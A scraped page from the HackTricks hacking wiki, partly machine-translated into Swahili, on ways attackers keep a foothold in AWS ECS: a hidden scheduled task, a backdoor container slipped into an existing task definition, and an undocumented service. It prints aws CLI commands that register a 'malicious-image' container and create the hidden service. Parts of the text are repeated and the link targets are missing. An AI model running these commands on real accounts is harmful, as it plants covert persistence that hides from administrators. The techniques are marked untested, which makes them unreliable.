AWS - ECS Persistence

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Support HackTricks

Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.

ECS

For more information check:

Hidden Periodic ECS Task

TODO: Test

Mshambuliaji anaweza kuunda kazi ya ECS ya siri ya muda wa kawaida kwa kutumia Amazon EventBridge ili kuweka ratiba ya utekelezaji wa kazi mbaya mara kwa mara. Kazi hii inaweza kufanya upelelezi, kuhamasisha data, au kudumisha kudumu katika akaunti ya AWS.

Backdoor Container katika Mwelekeo wa Kazi wa ECS uliopo

TODO: Test

Mshambuliaji anaweza kuongeza konteina ya nyuma isiyoonekana katika mwelekeo wa kazi wa ECS uliopo ambayo inafanya kazi pamoja na konteinia halali. Konteina ya nyuma inaweza kutumika kwa kudumu na kutekeleza shughuli mbaya.

Undocumented ECS Service

TODO: Test

Mshambuliaji anaweza kuunda huduma ya ECS isiyoandikwa inayokimbia kazi mbaya. Kwa kuweka idadi inayotakiwa ya kazi kuwa ya chini na kuzima uandishi wa habari, inakuwa vigumu kwa wasimamizi kugundua huduma hiyo mbaya.

Support HackTricks

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 3 days ago

ECS

For more information check:

Hidden Periodic ECS Task

TODO: Test

Backdoor Container katika Mwelekeo wa Kazi wa ECS uliopo

TODO: Test

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Undocumented ECS Service

TODO: Test

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"

Jifunze na fanya mazoezi ya AWS Hacking: Jifunze na fanya mazoezi ya GCP Hacking:

Support HackTricks

Angalia !
Jiunge na 💬 au au tufuatilie kwenye Twitter 🐦 .
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa na repos za github.